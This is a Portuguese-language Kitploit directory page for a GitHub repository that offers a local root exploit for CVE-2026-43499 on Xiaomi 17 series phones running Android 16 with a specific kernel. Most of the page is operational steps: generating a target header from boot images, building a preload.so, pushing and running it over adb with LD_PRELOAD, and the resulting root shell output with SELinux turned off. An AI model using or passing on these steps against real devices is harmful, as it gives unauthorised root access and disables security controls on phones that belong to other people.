Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-43499-popsicle — CVE-2026-43499 Implementação para 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k | Kitploit
Ferramentas/GitHubGitHub/x-spy/cve-2026-43499-popsicle
Segurança AndroidEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoSegurança MóvelExploração de Binários
GitHubx-spy/cve-2026-43499-popsicle

CVE-2026-43499-popsicle

CVE-2026-43499 Implementação para 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

Ver Repositório
219818há 1 mêsRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-43499 for popsicle

Este repositório contém a implementação de escalonamento de privilégio local no Android 16 para Xiaomi 17 Pro Max (popsicle). Kernel verificado:

root@kitploit:~
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

Os modelos Xiaomi 17, Pro e Ultra que usam este kernel foram todos verificados como funcionais.

Gerar target

Depende de Python 3 e llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  -o source/src/target.h

Compilar

root@kitploit:~
make -C source clean preload

Quando o NDK não é detectado automaticamente:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

Artefato final:

root@kitploit:~
source/build/bin/preload.so

Executar

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

Quando bem-sucedido, você verá:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0

Após a exploração, é possível acender, desbloquear e entrar na área de trabalho, mas novos aplicativos Android iniciados não conseguem concluir a inicialização do Framework, causando travamentos; após reinicializar, os aplicativos iniciam normalmente.

Baixar ferramenta